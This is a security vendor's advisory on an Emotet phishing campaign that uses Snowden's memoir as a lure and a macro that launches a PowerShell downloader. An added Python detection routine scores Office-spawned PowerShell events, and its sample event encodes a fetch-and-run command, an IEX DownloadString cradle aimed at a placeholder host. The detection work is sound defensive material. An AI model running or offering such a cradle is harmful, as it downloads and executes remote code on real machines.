Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Severity: High
Emotet recently resumed its spear-phishing campaigns, using the news about NSA whistleblower Edward Snowden’s new book, Permanent Record, as a lure. The memoir is already on Amazon’s bestseller list, and criminals routinely exploit such newsworthy events for scams and other social engineering. In this campaign, the Emotet operators purport to offer Snowden’s memoir as a Word attachment. Phishing emails from this campaign were observed in English, Italian, Spanish, German and French, as shown below.
When the document is opened, a fake message claims that “Word hasn’t been activated” and prompts the victim to click “Enable Content” in the security warning; doing so executes the malicious macro.
The macro runs a PowerShell command that retrieves the Emotet binary from a compromised WordPress site. Once infected, the machine attempts to contact one of Emotet’s many command-and-control (C2) servers.
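A defender-side illustration of the chain described above, added here and not part of the Rewterz advisory: a small Python triage routine that scores process-creation events (Sysmon-style parent, image and command-line fields, an assumed shape) for an Office application spawning PowerShell with a hidden-window, encoded download cradle, decoding the -EncodedCommand payload before matching. The sample event is constructed and uses a placeholder URL.

```python
import base64
import re

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Command-line fragments typical of download cradles and evasive launches.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
                         r"\biwr\b|start-bitstransfer|https?://", re.IGNORECASE)
HIDE_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.IGNORECASE)
ENC_RE = re.compile(r"-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def expand_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(3)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed payload: match on the raw command line only

def score_event(event):
    """Score a process-creation event (keys: parent, image, cmdline) -> (score, reasons)."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    score, reasons = 0, []
    if image not in POWERSHELL:          # only PowerShell children are scored
        return score, reasons
    if parent in OFFICE_PARENTS:
        score += 50; reasons.append(f"PowerShell spawned by Office process {parent}")
    if ENC_RE.search(event["cmdline"]):
        score += 20; reasons.append("encoded command line")
    cmd = expand_command(event["cmdline"])   # search the decoded payload as well
    if HIDE_RE.search(cmd):
        score += 10; reasons.append("hidden window / no profile")
    if DOWNLOAD_RE.search(cmd):
        score += 20; reasons.append("download cradle (possibly inside encoded payload)")
    return score, reasons

# Constructed sample event (hypothetical, not from the advisory) mimicking the
# macro-launched downloader: Word parent, hidden PowerShell, encoded cradle.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16le")).decode()
SAMPLE_EVENT = {
    "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "cmdline": f"powershell -w hidden -enc {_ENC}",
}
```

A score of 70 or more (Office parent plus an encoded or download-bearing command line) is a reasonable alert threshold; `score_event(SAMPLE_EVENT)` scores 100.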
IP(s) / Hostname(s)
URLs
Malware Hash (MD5/SHA1/SHA256)